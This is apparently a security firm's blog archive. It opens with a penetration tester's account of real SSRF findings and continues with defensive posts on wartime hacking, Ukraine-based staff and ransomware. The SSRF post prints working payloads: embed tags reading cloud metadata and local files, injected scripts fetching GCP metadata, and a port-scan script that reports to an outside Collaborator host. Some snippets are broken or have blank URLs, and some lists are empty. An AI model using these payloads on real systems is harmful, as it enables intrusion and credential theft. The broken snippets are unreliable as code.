SSRF in Real Life

Now that Server-Side Request Forgery (SSRF) has finally made it onto the OWASP Top 10 you may find yourself wondering whether this is really something you should be worrying about in your apps, or if it's more of an abstract risk that's not really exploitable in the wild. Let me confirm your fears: It is absolutely something you should be worrying about, it is not at all hard to exploit, and the results generally range from "Oh, this is pretty bad..." to "Game over, man!"

Over the past couple of years, I've found SSRF in about 1/3 of the apps I've pen tested. These days it's one of the first things I look for.

Once I've gained SSRF I have an open window that can lead to your local files, your internal network, your cloud metadata, or all of the above. Depending on what I find, I'll then spend a few hours browsing your Elasticsearch logs (it's funny how nobody adds authentication to Elasticsearch), seeing what I can do with your EC2 instance's IAM credentials, combing through the S3 buckets I've dumped using those credentials, and generally trying to pull down any of your local files I can get ahold of.

Common Categories of SSRF

There are plenty of good resources on what SSRF is, but I've found that the examples they provide tend to be overly simplistic or not representative of what I see in the apps I test. I break down my "real life" examples into three categories:

  1. Basic server-side requests: the app fetches a user-supplied URL (webhooks, RSS feeds, proxies)
  2. Server-side rendering of PDFs that include user-controlled content
  3. File (or URL) fetching gone wrong

Needless to say, these actions have to take place on the server. If the PDF conversion is taking place in the user's browser, I may get XSS, but I'm not going to get SSRF.

There are other SSRF vectors of course. Some people may ask "What about including scripts in SVGs?" Sure, that's always worth checking for, but I'm not really seeing image conversion much anymore. "What about XML External Entity (XXE)? That's basically SSRF, right?" Yeah, but I don't see XML config files much in use anymore either. (To be fair, I mainly pen test cloud-hosted SPAs with relatively modern front-end and back-end frameworks.)

Let Me GET That for You

The first general category of SSRF is the most straightforward. It occurs when a user supplies a URL, the app server pings that URL, and then returns some information about the response to the user.

SSRF Via Basic Server-Side GETs

In many of the simplistic examples you'll see in SSRF explainers, the "app" will have a GET endpoint that takes a URL as a query parameter, you supply an internal URL, and the "app" happily looks it up for you and returns the results. It seems pretty far-fetched that any app would actually do that.

Except... I did actually see that once. While doing some basic recon I stumbled across a subdomain that had a GraphQL API endpoint. It allowed full GraphQL introspection, so I spent some time digging through the available GraphQL queries. I came across an "ImageProxy" query that, indeed, took a URL as a query parameter. The endpoint would issue a GET request to the supplied URL and return a base64-encoded version of the response. For example, it was nice enough to return the ECS Task Metadata when I asked for it with a query like {ImageProxy(url:"http://...")}:
SSRF example result: ECS Task Metadata returned from a GET request

SSRF via Webhooks and RSS Feeds

But that's not typical. What is more common is for an app to allow a user-input webhook URL or RSS feed URL. For example, the app may send a POST request to the webhook URL whenever a new user gets created, or something along those lines. Or it'll have an in-house "RSS reader" feature.

When the user is first setting these things up, the app will usually do some sort of validity check on the user-input URL. It'll typically issue a server-side GET or POST request to the URL and prevent the user from saving the URL if it's "invalid".
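To make the flow concrete, here's a minimal sketch of what such a "validity check" often amounts to server-side. This is an assumed shape in Node.js, not code from any specific app; the names `checkWebhookUrl` and `verdict` are mine:

```javascript
// Hypothetical sketch of a webhook "validity check" in Node.js (18+).
// The server fetches whatever URL the user supplied -- that request is the SSRF.

function verdict(status) {
  // Collapse the server-side response into the "OK / Not OK" the user sees
  return status >= 200 && status < 400 ? "OK" : "Not OK";
}

async function checkWebhookUrl(url) {
  try {
    const res = await fetch(url); // server-side request to user-controlled input
    return verdict(res.status);
  } catch {
    return "Not OK"; // refused, timed out, DNS failure, ...
  }
}
```

Nothing here restricts the URL to external hosts, so http://localhost:22 or a cloud metadata endpoint sails right through.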

Blind SSRF

In my experience the server will generally allow requests to localhost, internal endpoints, and metadata services. At the very least this usually gives me blind SSRF. For example, suppose I enter the following for my webhook URL:

http://localhost:22
The endpoint may issue a quick "Not OK" if port 22 is closed on localhost. If port 22 is open, the server may time out, or it may respond with a message that includes a banner from the response, like:

wrong status line: \"SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\"

Okay, so technically that's not "blind SSRF", but simply returning a banner doesn't do much for me.

Full-fledged SSRF

Occasionally I get lucky and instead of a simple "OK / Not OK" the server will return the entire raw response from the URL. I recall an otherwise-very-good app that was doing this. For the webhook URL I entered:


(This is the decimal equivalent of, AWS's IPv4 metadata endpoint. The app had a filter in place that blocked the dotted-quad IPv4 address, but it allowed the decimal equivalent through. PayloadsAllTheThings is an excellent resource for SSRF filter bypasses.) I clicked "Test Webhook Connection" in the app and the server promptly delivered me the AWS metadata for its EC2 instance:

Success! Response is: 200: ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hibernation/ hostname iam/ identity-credentials/ instance-action instance-id instance-life-cycle instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ product-codes profile public-keys/ reservation-id security-groups services/

These were the various instance metadata categories available. Note in particular the iam category. It turned out that this EC2 instance had an IAM role associated with it. (I find this to be the case roughly half of the time.) By drilling down through the iam path I first found the role name, then the security credentials for that role. I opened up a terminal, added those credentials to my local ~/.aws/credentials file, and used the AWS CLI to see what I could find out. It turned out that these credentials gave read access to the company's AWS Secrets Manager, which included the API keys and passwords for pretty much every service they had going.

Render Unto Hackers

The second general category of SSRF I tend to find occurs when rendering PDFs on the server. It's surprisingly common, accounting for almost half of the SSRF vectors I've found. If I see that you are rendering a PDF that includes user input, I'm immediately going to start attacking it. And honestly, it usually isn't that hard.

Typically the app will be generating some sort of report. It is not uncommon for an app to allow user-input HTML to appear in these reports. The user will see a nice WYSIWYG editor that only allows a few Markdown-type elements. But I'll hijack that request to the API and try to inject something more interesting.

SSRF via Embeds and Iframes in PDFs

My go-to element is an <embed>. If I'm just exfiltrating a single endpoint then an <iframe> will work equally well. But <embed>s tend to play nicer when it comes to formatting. And I do often need to play with styling to get the exfiltrated information to fit within the PDF document.

A typical report injection looks something like this:

    <h1>SSRF test</h1>
    <embed src="" style="width:100%;height:300px" />

The report as viewed in the browser won't show anything special. But when I click "Download", the report is rendered to PDF by the server and the AWS metadata gets embedded in the PDF version of the report:

SSRF example result: AWS EC2 Metadata embedded in PDF

No IAM role in this case. 😢

A nice thing about this category of SSRF is that, in addition to making HTTP(S) requests, I can usually embed local files as well. For example:

SSRF vector: HTML <embed> tags allowed in reports

led to the following appearing in the report's footer:

SSRF example result: Local Windows file embedded in report

Unfortunately there's no way (I know of) to list directory contents using this technique. I'll typically just use a well-known file list, include about a thousand <embed>s per chunk, and then scan through the resulting PDFs looking for hits.
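Generating those chunks is trivial to script. A sketch of the idea; the file list, helper name, and styling here are illustrative, not from any real engagement:

```javascript
// Build one chunk of <embed> tags from a wordlist of well-known file paths.
const wellKnownFiles = [
  "file:///etc/passwd",
  "file:///etc/hostname",
  "file:///C:/Windows/win.ini",
];

const chunkHtml = wellKnownFiles
  .map((f) => `<embed src="${f}" style="width:100%;height:120px" />`)
  .join("\n");

console.log(chunkHtml);
```

Paste a chunk into the report field, download the PDF, scan it for hits, repeat with the next chunk.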

SSRF Via Scripts Executed During PDF Rendering

Occasionally I'm able to inject <script> tags or event handlers on elements. That opens up a lot of possibilities, a couple of which I'll discuss below.

Including Headers in Requests

The AWS instance metadata I retrieved from the apps in the previous examples required a simple GET request. It's no problem to fetch this metadata with an <embed>. (BTW, you really, really should either migrate to IMDSv2 or simply turn off access to the AWS EC2 metadata completely if you're not using it.)

But for apps running on a Google Cloud Platform (GCP) instance a simple GET won't cut it. To access the GCP instance metadata the following header needs to be included in the GET request:

Metadata-Flavor: Google

We can't do that with an <embed> (AFAIK) but it's easily done within a <script>:

  <div>Exfiltrated data:</div>
  <span id='result'></span>
  <script>
    exfil = new XMLHttpRequest();
    exfil.onreadystatechange = function () {
      if (exfil.readyState === 4) {
        document.getElementById("result").innerText = JSON.stringify(exfil.response);
      }
    };
    // GCP metadata root; drill down from here for SSH keys, tokens, etc."GET", "http://metadata.google.internal/computeMetadata/v1/");
    exfil.setRequestHeader("Metadata-Flavor", "Google");
    exfil.send();
  </script>

In this particular case I was able to inject <script>s in the "Education - Notes" section of the PDF report:

SSRF example result: GCP instance metadata embedded in report

From the GCP instance metadata I was able to grab SSH keys, Kubernetes config files, credentials for a service account, and other fun stuff. And with the service account credentials I then had read access to all of their storage buckets, among other things.

Importing a Script File

Uploading malicious payloads to the app can become tiresome after a while, especially when you have to deal with space limitations or escaping special characters. That's when it's nice to call out to an external script. I usually just set up a quick Sinatra app, expose it to the internet using ngrok, and serve up my scripts that way. Or I may put the script in an S3 bucket (as in the example below), a GitHub repo, or something like that.

One app I tested was importing posts from a popular social media site and including details of the posts in a PDF report. They'd forgotten to sanitize the content of the posts before rendering them in the report.

In my social media post I included some text like the following:

<img src=x onerror="document.write(`<script src=&apos;…&apos;></script>`)"/>

In this case I added an onerror event handler that over-wrote the entire document and imported my external script test_ssrf.js. (I don't particularly care for this technique of overwriting the document because it often screws up the PDF rendering process. But in this case it worked fine.)

I can then simply update my external script and click "Download report". For example, I'll open up a Burp Collaborator client and run a port scan on localhost using a script like the following (which I've borrowed from HackTricks):

// test_ssrf.js
// Port scan of localhost

const checkPort = (port) => {
  // "Attempting port" ping (Collaborator base URL elided)
  let img1 = document.createElement("img");
  img1.src = ``;

  // If the fetch resolves, something answered on that port: phone home
  fetch(`http://localhost:${port}`, { mode: "no-cors" }).then((res) => {
    let img = document.createElement("img");
    img.src = `https://<collaborator>/ping?port=${port}`;
  });
};

for (let i = 0; i < 65535; i++) {
  checkPort(i);
}

// Keep the renderer busy while the pings go out
for (var i = 1; i < 10000000; i++) {}

That last little for loop is just to keep the server busy while it sends me the pings:

GET /ping?port=80
GET /ping?port=443
GET /ping?port=7000
GET /ping?port=8081
GET /ping?port=9200

I'll then zero in on the various services, extracting whatever I can.

File Copypasta

The final general category of SSRF I'll discuss here is a little more nebulous than the first two. I think of it as file (or URL) fetching gone wrong. This usually takes some work to find. First I need a decent understanding of how things are working behind the scenes, on the server, and then I need to come up with ways to break the usual flow. I'll give a couple of examples. They're both pretty app-specific but still interesting to see.

SSRF via Email Attachments

An app allowed admins to send out bulk emails to the users in the admin's organization. They allowed file attachments to the emails. The file attachments were base64-encoded and added as a request parameter:

Example Burp request for adding an email attachment

I had no real reason to think that changing the email_attachments to a URL would work, but it was worth a shot. And indeed, after changing it to a Burp Collaborator URL, I received a ping:

GET / HTTP/1.1
accept-encoding: gzip,deflate
user-agent: nodemailer/4.7.0
Connection: close

So, the app was using an old version of nodemailer. It quickly became clear that the app was simply taking the user-input email_attachments string and supplying that as the path parameter in the nodemailer email attachment API.

The app was expecting data URIs. By feeding it a URL instead, nodemailer would look up the file located at the URL and attempt to attach that.
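In nodemailer terms, the server was apparently doing something along these lines. This is a sketch with hypothetical variable names, not the app's actual code; nodemailer's attachment `path` option accepts file paths and URLs as well as data: URIs, and fetches whatever it's given:

```javascript
// User-controlled "attachment" string flows straight into nodemailer's
// `path` option with no validation.
const emailAttachments = "file:///app/package.json"; // attacker-supplied value

const mailOptions = {
  to: "everyone@victim-org.example",
  subject: "Bulk mail",
  attachments: [
    {
      filename: "attachment.txt",
      path: emailAttachments, // app expected a data: URI; never checked
    },
  ],
};
```

Restricting the field to data: URIs (or passing the decoded bytes via nodemailer's `content` option instead of `path`) would close this off.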

(Funny thing, it really wanted a file extension on the URL. It wouldn't include an attachment when I supplied the bare metadata URL. But when I tacked a fake file name onto the end as a hash fragment, it was happy to attach a .txt file that included the AWS metadata.)

And nodemailer would attach local files. Here I grabbed the app's package.json from the server:

SSRF vector: Retrieving local package.json file via an email attachment

I received it as an email attachment:

SSRF example result: package.json file received as an email attachment

Hitting the send_email endpoint with a list of well-known file paths led to some nice findings: config files, user dumps, etc.

SSRF via JIRA Import

A project management app had a migration process from JIRA. It had two SSRF vectors.

Part 1 - Blind SSRF

The first SSRF was less interesting, at least on the surface. To import from JIRA the app needed the user's JIRA Cloud URL. It was expecting a URL like https://yourcompany.atlassian.net, but the app failed to properly validate this and in fact allowed any URL through. For example, I issued the following request to the "set up a new JIRA import" endpoint:

POST /api/jira/imports HTTP/2

{
  "jira_hostname": "https://<burp-collaborator>/test",
  "container_id": "aaa"
}

And my Burp Collaborator received a ping:

GET /test/rest/api/2/project/aaa?maxResults=100 HTTP/1.1
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.12)

At this point I had blind SSRF of the sort I discussed in the first examples.

Part 2 - Full SSRF

But this got me wondering... During my legitimate imports from JIRA the app would also import any file attachments associated with my JIRA cards. The files were stored on Atlassian's servers, specified by some URLs that were attached to my JIRA cards. What I wanted to do was to change these file attachment URLs to something nefarious and see if I could trick the project management app into importing from them.

I didn't see a way to change the file attachment URLs on my JIRA cards directly. (Maybe there's a way, but I wasn't about to start "testing" Atlassian.)

But when I looked back at the Burp ping I received, above, I realized the app was trying to import JIRA cards but failing because it didn't like the response it received. Maybe I could fake the response, duplicating what JIRA would normally respond with, except modify the file attachment URLs?

It took about 5 levels of faking a JIRA response, receiving a new request from the app, then faking the next JIRA response, before I finally got to the app's request that asked for the file attachment URLs. I responded to that request with something like this:

  "issues": [
      "fields": { 
        "attachment": [
            "filename": "simple-test-1.html",
            "size": 16,
            "mimeType": "text/plain",
            "content": ""

The content field here was the file attachment URL. I was asking the app to "import" the AWS metadata. Once the import went through, back in the project management app I could open the attachment and I had the server's IAM role name:

SSRF example result: AWS EC2 IAM role name included in attachment within the app

With the IAM credentials of that role I had read access (at least) to the S3 buckets associated with all sorts of file import/export functionality in the app.


What OWASP has to say about including SSRF in the new OWASP Top 10 is kind of funny:

A10:2021-Server-Side Request Forgery is added from the Top 10 community survey (#1). ...This category represents the scenario where the security community members are telling us this is important, even though it's not illustrated in the data at this time.

Well, I'm glad they decided to listen to the community, even if begrudgingly. SSRF is definitely out there, it's usually not that hard to find, and the results can be pretty devastating.

Pen testing is one of the services we offer. If you're interested in having us pen test your app, reach out to us!

Planning for Escalated Hacking

Many of our customers have been asking us how they should plan for escalating hacking and cybercrime activity in light of the conflict in Eastern Europe. Whether it is Russia, cybercrime gangs, or other nation-states operating under the cloud cover of that conflict, increased hacking is certainly something we can reasonably expect.

The TL;DR response is: if you have a good security program in place now, there isn't anything you should necessarily be changing based on this situation. If, however, you are not sure you have a solid program in place, there's probably no one thing you can do - so you'd want to put a broader plan in place, and you should expect that may take some time.

I realize this probably isn't what anyone wants to hear. I will still go ahead and list some important things you can do, and key references, to try to be as useful as possible - but we have to be independent thinkers and stay honest, and I'm not sure the hype is helpful.

Note, if you are interested in what to do for your developers in Ukraine, we wrote a post about that.

It's Too Little, Too Late


Ironically, many of the queries about escalations came from customers whose board members started asking about security because of the conflict. Unfortunately, when the bits are flying it is too late to start building a program and putting in place the defenses you need to resist escalated hacking conditions.

There is no "one thing" you can do to prevent it. There is no easy button.

It makes me wonder if the same board members were encouraging their teams to build out security programs in general. It also makes me wonder if the board members are also on the boards of the security companies they are promoting.

You can't buy a tool to eliminate your risks from cybersecurity conflict. You need to plan and execute over time to manage escalated security environments.

OK But Seriously, What Can We Do?

There are a couple of good resources I would point to on this. CISA provides information and great resources on its Shields Up page. The takeaways are largely what we would advocate as well.

Another thing you can do is look for software you are running that CISA has identified as being targeted by hacking campaigns in its Known Exploited Vulnerabilities catalog. Of course, there are likely other vulnerabilities that aren't yet on that list, but this is a good starting point. Generally the action for any software you are using on this list is to disable it or to update it to a version that fixes the vulnerability.

In the big picture, we would normally advocate for a holistic program aligned to a major standard such as NIST 800-53 (which is what our application uses as its primary standard) and broadly speaking, that is what we feel you need to prevent issues from happening.

If this is too big, you could use our worksheet on the 21 Actions to Improve Security Today. The bottom line is there is no time like the present to make sure you are planning for escalated hacking - but you need to plan and navigate that yourself, not based on some checkbox solution.

The Elephant in the Room

The easiest way to get hacked is to leave an unpatched system online, or to have a user click on a phishing link and supply their credentials. But watering hole attacks, where a themed site with outrageous content is set up to attract visitors and then distributes malware as they browse, are also quite likely. Vigilance can help prevent or detect these types of attacks as things escalate.

On the other hand, a problem is that many large companies have deeper security problems you can't easily build a plan to mitigate. For instance, it is likely that all major companies (including say cloud providers) have sleeper intelligence agents working there as full time employees waiting for a direction to cause damage or wreak havoc. If things get very bad, disruption of major cloud services might become a strategic goal for a party that has the power to pull that off based on this latent threat. You can't prevent this with vigilance. You can have backup and alternative delivery strategies to maintain maximal business continuity, but until recently such an attack would seem so far fetched as to be not worth planning for.

Conclusion - Planning for Escalated Hacking

With each passing day I am more shocked and saddened by the events unfolding and I feel a sense that people are sensationalizing or trying to get as much out of them as they can. I'm unimpressed by the boards' new attention to cybersecurity. They should have been funding cybersecurity all this time.

The reality is, for most likely problems you should already have a solution in place. But for some, you don't and you can't. That is the reality. Security is a marathon not a sprint. The best way to plan for escalating hacking incidents is to start and maintain a broad security program.

Map credit: Ukraine - Wikipedia - By Rob984, ByStaJ - Location European nation states.svg, CC BY-SA 4.0, Link

Securing Tech Workers in Ukraine

Although Jemurai and most of our customers are based in the US, many customers have folks working all over the world, including Ukraine. Several customers have asked us what they should do to protect their people, information assets and otherwise prepare for potentially escalating conflict there.

Now, as a Ukrainian friend of mine was quick to point out, this is not as new a conflict as most people in the U.S. may think. So hopefully if you're in this situation, you've already identified the risk and given thought to how you think about securing your systems. And in many ways, it just raises the stakes on things you should probably already be doing as part of your security program. But we thought it made for a thought provoking exercise and decided to write up our thoughts in this blog post. Note that we are not intending to take a political position in this post, though I think we can generally say that we hope that armed conflict does not escalate - for everyone's good.

The Context

First, it is important to understand and level-set on a few things that are true in the case of Ukraine that are not necessarily always true:

  1. There is a history of both denial of service and deeper IT intrusions in Ukraine
  2. There is an active propaganda campaign that may be casting a wide net
  3. There is a risk of physical loss of assets
  4. The lines between government forces and civilian actors are blurry
  5. The same government and civilian actors have a history of attacking US based companies

Based on all of this context, there are some things that become more important for your organization's security - the sections that follow cover these.

Note that even if you do not have team members in Ukraine, it is worth knowing that CISA has been publishing information about active campaigns and the vulnerabilities being used in them. With general tension and adversarial behavior either increasing or becoming more visible, it is probably a good time to step back, think about your organization's security posture in general, and make sure it is aligned to the risks out there.

CISA also provides further information and great resources on its Shields Up page.


These are the protections we identified as being very important given the context.

Business Continuity for Systems Hosted in Ukraine

Most of our customers that have a presence in Ukraine have developers there, but not hosted data centers or offices with backend systems. However, if your organization does have hosted data centers or offices with backend systems running, it is critical to identify these systems and make a plan for how you would run any of those backend services if the ones in Ukraine were unavailable.

We would start by making an inventory of these systems, ranking criticality and then figuring out what alternatives may be possible. This should be part of a typical business continuity or disaster recovery plan.

An additional consideration, which will come up again, is the possibility that Ukraine-hosted systems could be seized.

Encrypt Hard Drives

Generally it is a good practice to encrypt all drives on laptops, phones, tablets, desktops, and servers. This can be done with OS-native software in most cases. The likelihood that a device might get lost, left behind, or seized during a prolonged event is significant. An encrypted drive provides much of the protection of a remote wipe - and a remote wipe capability is also worth establishing so that a device can be wiped in the event it is lost.

Strong VPN

To protect against network traffic in general being rerouted and inspected, we recommend using a Virtual Private Network (VPN) for all users. It isn't 100% clear what the capabilities of various threat actors are but it is quite possible for network traffic to be rerouted during a conflict through either seizure of local network infrastructure or associated hacking exercises.

Using a VPN can protect against basic traffic interception. You may also want to look at how access to production environments works and restrict it such that it has to be intermediated by an auditable command channel. For instance, AWS Systems Manager Session Manager provides a strongly authenticated, auditable way to access your production environment. A related control is network segmentation, which needs to be in place in any data center to help enforce things like least privilege and separation of duties.

Anti-malware (XDR)

In addition to the increased risk of physical loss of devices, there is a likelihood that there will be organized campaigns to win Ukraine based digital assets - including both phishing and website based malware campaigns (watering hole attacks). In other words, attackers might stand up websites with inflammatory information (from a variety of angles) and use the websites to distribute malware to visitors. To reduce the risk of malware through these channels, we recommend using an XDR product.

Strong Authentication - MFA Everywhere

Use multi-factor authentication (MFA) wherever possible.

Maybe the most important step is to review your production environments for access that is governed by access keys and secrets that don't also require MFA. We want to ensure that access to cloud operational systems requires MFA - and is potentially done through auditable channels.

Many mobile device management (MDM) platforms allow for enforcement of MFA on startup and configuration management in general (e.g. encrypted hard drives).

Although there are valid discussions in the infosec community about the strength of different channels for delivering MFA (SMS vs. Authenticator) the most important thing is to have MFA enabled.

In general, we prefer single sign-on (SSO) to MFA. But we need to be careful about the implications when an SSO provider issues a long-lived session token once a session is established. So the devil is in the details a bit with SSO - but at a high level, make sure MFA is required for access to key assets.

Least Privilege and a Process To Deprivilege

If you have developers based in Ukraine, they may need access to certain things and not others. Given the elevated risk, it is very reasonable to reassess that access and step back to providing only what they actually need.

For example, if you have two products, maybe they only need access to the one they are actively working on. Similarly, maybe it is possible to reduce access to a particular development environment and not provide access broadly to AWS resources, for instance.

Another consideration is that you may want to reduce privileges for a period of time, either in general (e.g. Ukraine-based devs don't need access to production for a while) or as a response to specific events (e.g. a laptop is confiscated during military exercises).

Least privilege is hard and generally underappreciated work when it comes to security - because people complain when they don't have access, and it is complicated to establish strictly what access is required for a given activity. Still, time spent here reduces your attack surface in the event that a developer's access is somehow stolen.

Eliminate The Use of Local Secrets

Ideally, developers don't have credentials to production systems sitting on their laptops. Again, the risk here is that a laptop is repossessed and there are secrets on the hard drive that are accessed.

A concrete way to achieve this is to use something like aws-vault, which stores access keys and secrets in the OS keychain. Keeping private keys, credentials, and other secrets out of local files reduces what an attacker can get at if they somehow gain access to a running system and can see the file system.
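For instance, with aws-vault the day-to-day flow looks roughly like this (an illustrative transcript; the profile name "prod" is made up):

```shell
# Store the keys in the OS keychain instead of plaintext ~/.aws/credentials
aws-vault add prod

# Run AWS CLI commands with short-lived credentials injected at runtime
aws-vault exec prod -- aws sts get-caller-identity
```

Nothing sensitive ever lands in a dotfile, and `exec` hands the child process temporary credentials rather than the long-lived keys.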

Review Alerting Around IAM and Resource Provisioning

Confirm that alerting is in place to detect changes to your identity management system, whether that is AWS IAM or G Suite or JumpCloud or Okta. A common action taken by an attacker may be to establish other identities they can use in your account. You want to be able to detect this.

Another common attacker action is to create additional resources (e.g. EC2 instances) that can then be used to create a lasting presence in your network. Being able to track these, say with AWS Config or CloudTrail, is another important capability.
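In AWS, one way to wire this up is a CloudTrail-backed EventBridge rule. A sketch of an event pattern for the actions above (the exact event names you alert on will vary with your environment):

```json
{
  "detail-type": ["AWS API Call via CloudTrail"],
  "detail": {
    "eventSource": ["iam.amazonaws.com", "ec2.amazonaws.com"],
    "eventName": ["CreateUser", "CreateAccessKey", "AttachUserPolicy", "RunInstances"]
  }
}
```

Point the rule's target at an SNS topic or chat webhook so a human actually sees new identities and new instances when they appear.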

Physical Security

Honestly, there's not a lot a small developer shop can do to ensure physical security of a team in a potential conflict zone. It may be worth offering short term relocation. Larger companies might provide more secure locations or seek paid protections but for most of our clients, this is not something they are able to think about.


Canaries

In InfoSec there is the idea of a canary, derived from the old practice of taking a canary into a coal mine: an early warning signal that something is wrong. Although it is hard to think about, it is certainly possible that a team member could be held captive and forced to provide passwords and MFA tokens. Organizations can establish canaries - otherwise harmless-looking signals that indicate whether a person is OK or has been compromised - so that their access can be removed.

Some companies use the idea of warrant canaries to signal whether law enforcement is asking them for detailed personal information and asking them not to disclose that they have been asked.

In this scenario, a company could provide a simple check-in process that, if followed, indicates everything is OK, but if missed triggers removal of privileges. Of course, if you do institute such a process, you would want to also establish communication channels and authentication/validation processes for reinstating privileges.

Developer Continuity

An obvious concern is developer productivity and continuity of access. The internet could go down. A laptop could be confiscated. It can be possible to provide a backup network (eg. cell phone) or process for getting a new laptop - but it is probably not possible to fully mitigate the risk of developer downtime. Therefore, we advised our customers to plan for some of this and evaluate projects that have critical contributors and important timelines - and revisit plans to see if they can be adjusted to provide better continuity. Ultimately, we see this as a case where we need to be aware of the risk and mitigate it the best that we can - but not expect to fully eliminate the risk.


For me, it feels surreal to think that we may have colleagues in conflict zones. For many of us, though, that has been true for some time, and it is probably something we need to include in our threat models and risk strategy. This post tried to highlight some of the specific things that may matter more given the circumstances we see developing in Ukraine. It is intended to be an example and to provoke thought. Stay safe out there!

Map credit: Wikipedia, "Location European nation states.svg" by Rob984 and ByStaJ, CC BY-SA 4.0.

Ransomware Attacks and Small Businesses

Ransomware attacks are big news right now. According to US Secretary of Homeland Security Alejandro Mayorkas, ransomware attacks are up a whopping 300% over the last year. Sadly, major pipelines and meatpacking plants and their million-dollar ransoms are just two mid-2021 examples of how serious these attacks are becoming to our critical infrastructure.

However, an even more disturbing story is the growth of the ransomware industry that puts all organizations at risk. Every organization must take the threat of a ransomware attack seriously—small businesses won’t get overlooked because of their size. In fact, 50% to 70% of ransomware attacks target small and medium-sized enterprises.

The same ransomware group that attacked JBS Foods also recently attacked Sol Oriens, a small consulting firm. The hacker group has since published confidential employee data to its blog on the dark web. It also threatens future disclosures, which it declares it has a right to do because the company “did not take all necessary action to protect personal data of their employees and software developments for partner companies.”

Professional service firms, government contractors, healthcare, high-tech companies, and local governments are popular ransomware targets, but attackers can strike any type of organization. Even the Saint Elizabeth Ann Seton Catholic Church and School in Wichita, Kansas, recently became a ransomware victim.


The first step of a ransomware attack is for a bad actor to gain access to where they shouldn’t be. After that, they could attack anything from a single laptop to an entire network, even cloud services. Often they pivot from an initial entry point to an internal reconnaissance stage where they might get a foothold on many or most machines across a network.

During the attack, bad actors use ransomware code to encrypt files, data, and whatever else they can access through the compromised device. Depending on the scope of their access, they may also lock down a single system or an entire network. The hackers don’t have to infiltrate the entire network or reach the most sensitive data to cause damage. In many cases, victims shut down other systems to protect themselves while investigating and assessing the scope of the attack.

Once hackers are in control, they send the ransom note. When the ransom is paid, they’ll provide instructions on how the organization can regain access or decrypt its files. Naturally, they like their ransom paid in cryptocurrencies like Bitcoin because, in theory, it allows the recipient to remain anonymous.


Ransomware is the top malware threat SMBs face, and the costs of an attack are high. According to a 2020 survey of managed service providers (MSPs), the average ransom hackers demanded from SMBs was relatively modest—around $5,600. The higher costs come from the downtime the attack inflicts on the business. For SMBs, the average cost of downtime due to a ransomware attack last year was $274,200, almost 50 times the ransom amount. And for 39% of the small businesses attacked, the downtime was extensive enough to threaten their ongoing viability.

While the average ransom demand may be modest, other surveys found that larger SMBs can get demands exceeding $100,000 and that 50% of all ransomware demands were higher than $50,000.

Ransom payments, downtime, and remediation costs can be quantified, but they aren’t the only costs. There are also costs to the company’s brand, reputation, and relationships. In many cases, client and customer data is at risk in a ransomware attack. In addition, operational disruptions also impact clients. 


Most ransomware attacks come from well-organized cyber gangs. Different ransomware organizations have different targets. Some conduct long-term sophisticated attacks against major corporations, like Colonial, with high ransom demands.

Others operate on volume. They attack smaller businesses that are easier to breach and ask for a ransom proportional to the organization’s size. Balanced against the costs of downtime, potential impact on clients, and risk of public exposure, requesting a reasonable sum increases the likelihood the SMB will pay the ransom.

Under another model, hackers infiltrate a network and sell the compromised network’s encryption key to a second group that carries out the ransomware attack. Ransomware attacks have become so commoditized that some hacker groups actually package “ransomware-as-a-service” (RaaS). Then, they sell the RaaS code to bad actors who don’t have the technical expertise to launch an attack on their own. RaaS and selling decryption keys have expanded the pool of bad actors who can conduct ransomware attacks so that every organization is now—or will soon be—a likely target.

And the ransom payments are only one revenue stream for ransomware attackers. It’s become more common for ransomware hackers to exfiltrate data and sell it on the dark web—not to mention using the data to conduct future attacks.

Bottom line: Ransomware attacks are good business for hackers, and we can only expect the rate of attacks to grow.


Phishing is the most common attack vector bad actors use to access and lock down a company’s digital assets. They send emails with attachments or links that deliver malware when clicked. Other phishing schemes use sophisticated communication (email or text) and look-alike websites to induce employees to provide login credentials or personal information on what appears to be a legitimate website.

After phishing, the most common attack vectors are:

Once attackers gain entry to the network, they start searching for the most sensitive data. They often operate undetected for extended periods when they’re able to use real credentials. Then, when they feel they have access to enough sensitive data to cause pain, they’ll initiate the ransomware attack.


Protecting usernames and passwords is critical, as the most common attack vectors rely on human error to steal network credentials and gain access. Security policies and other steps you can take to protect credentials include:

Other security policies and software solutions to protect against ransomware attacks should address:

Of course, this is a short list of actions. Protecting your company against ransomware attacks requires a formal security program. The ongoing process of developing IT security policies and implementing specific security controls will continue to harden your company against a ransomware attack.


Your security program should include a ransomware incident response plan. In addition, your ongoing security training should include roleplaying a ransomware incident to ensure everyone knows what to do should an attack occur.

So, what are your options once you’ve been attacked?

Pay the ransom. Many companies take this approach to minimize the downtime and impact of the current attack. However, paying the ransom comes with risks. In some cases, companies don’t receive full access to their systems and data despite paying. In addition, there may be legal risk to paying or facilitating the payment of a ransom. There’s also the concern that paying can lead to more attacks, both in general and against the paying company. A recent survey of organizations that paid the ransom found that 80% were victimized in a second attack.

Decrypt your files. With assistance from cybersecurity and decryption experts, you may be able to decrypt your files. However, most ransomware attacks use highly sophisticated encryption algorithms. The time and computing power needed to break them would likely be too high to undo the damage caused by the attack.

Restore files and systems from backups and/or images. A company with a comprehensive backup and disaster recovery plan should be able to restore its data and systems. This doesn’t mean an attack won’t still come with a cost—the mitigation, investigation, and recovery processes all take time. However, it does limit operational downtime and avoids the need to pay the ransom.


Too many small businesses underestimate their chances of being ransomware targets, but this is short-sighted. A small business can be an attractive target as “easy prey” or because of its relationship with a larger, more lucrative, or strategic company or government department.

Now is an excellent time to review your existing security program and IT security policies to see how well your company is defending itself against a potential ransomware attack, and to revisit your business continuity plans in case ransomware attackers choose you as a target.

Creating a Security Culture

Protecting your company requires a robust security program with documented policies and processes; but without consistent, thorough execution of those policies, your company isn’t actually any more secure. Program documentation, no matter how detailed or organized, doesn’t harden any targets on its own. That's why building a company culture of security is a vital part of your security program. Lack of an active security culture throughout your organization undermines its security readiness.


Security for many small businesses and start-ups may be lax because they have no program at all. Getting started building a security program is step one, but the focus can't be only on securing devices and assets. Humans remain the weakest link in cyber defense yet often receive the least attention in most security programs.

When a documented IT security policy fails, you'll often find a human element behind it. Perhaps someone was careless with a company laptop. Did an employee fall for a phishing scam? Maybe even an IT team member forgot to deactivate the credentials of a separated employee.

